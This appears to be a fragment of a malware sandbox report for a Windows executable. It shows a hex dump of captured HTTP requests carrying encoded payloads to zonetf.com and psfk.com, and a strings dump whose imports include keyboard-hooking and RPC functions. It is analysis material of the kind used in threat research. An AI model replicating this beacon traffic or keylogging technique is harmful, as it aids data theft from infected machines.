0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 78623579 676d3143   JuX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a424233 6b675243 4f39706d 636f7743   .BB3kgRCO9pmcowC
0x00000170 (00368)   2532465a 48366335 4862586c 71437875   %2FZH6c5HbXlqCxu
0x00000180 (00384)   4936566b 476b7455 4b633650 785a6b74   I6VkGktUKc6PxZkt
0x00000190 (00400)   46564f53 70757577 584e634e 4e467048   FVOSpuuwXNcNNFpH
0x000001a0 (00416)   43253242 78566653 30507333 68784966   C%2BxVfS0Ps3hxIf
0x000001b0 (00432)   30636563 43645549 5379466b 764b7925   0cecCdUISyFkvKy%
0x000001c0 (00448)   3246374e 305a4763 324a6761 67637272   2F7N0ZGc2Jgagcrr
0x000001d0 (00464)   57253246 30376a66 4444774f 77483670   W%2F07jfDDwOwH6p
0x000001e0 (00480)   356b4434 53494856 38437852 5a385054   5kD4SIHV8CxRZ8PT
0x000001f0 (00496)   25324646 45432048 5454502f 312e300d   %2FFEC HTTP/1.0.
0x00000200 (00512)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000210 (00528)   73650d0a 486f7374 3a207073 666b2e63   se..Host: psfk.c
0x00000220 (00544)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000230 (00560)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000240 (00576)   696c6c61 2f322e30 0d0a0d0a            illa/2.0....


Strings
@.R..L.&E....J1r.
.Q@.....W..h.q
;(.U..
....
A
.w..."
[...
.....3..
........~.a.[
$.0
.
.{
...
...`Y..
5
.n
._..{.t.A.j..V._.^s../.}.{
....g...$.h
.p...\.0=.......
G
.q.&NBc-#.4j...
.
g'
040904b0
1532
"	&3
>5\f@
e'EG
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
>0#k8-
-1W;L{
<*4PFc
4s	yR"
4u?VZkxit
?6)6K=R
7c^up6X
7ifx#Y
7(j?},
_{7*N{
 8ON\D
8tw62_
8YzhrA	'#J
95w/:<
\9	67Z
>a6-?fF
,AC<:e`
a~X9d"
=,[/%b[{
CallNextHookEx
.cDa h4^
ChildWindowFromPoint
ClipCursor
COMCTL32.dll
comdlg32.dll
CompareStringW
CreateFiber
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
'#deZn_fCr
DrawEdge
EmptyClipboard
EnumResourceNamesA
FA,>w3Z
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
fyjit`
!gdnye,W
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
{h]*+e
:[HHMA
I9=,Ts
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
JFo?}jm
JRichu
JW}w|"
?jZ`7Z
K[eAP,WW
KERNEL32.dll
kX?33,^
kyz,|	
L9"+-/
=L^nK_
LocalAlloc
LockFile
!lr]>3.
lYbtIF
l~z)UD
M2L~~i 
m@&b<i
mMSLGr
NdrClientCall
:n|wz1
O8n{v-kZ,
o	^JVT
`.rdata
RealGetWindowClass
RegisterClassW
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
/t@[_~[
<(t5PS
TerminateProcess
!This program cannot be run in DOS mode.
t;H?XK
ToAscii
,tw/>#
UnhookWindowsHookEx
UnlockFile
USER32.dll
V7ksyC
VerLanguageNameW
@\vp)4
WcBab4
	Welmr
WinHelpW
XAxZEl
(x\{-D
XU}n*}r
-Y2Jhf3
(yJZn5-q
yN9k?ZG
<yU;vw/
z5z8h/
Z`fvQxF
z??o.S
zpxrD+6
|z	%'St9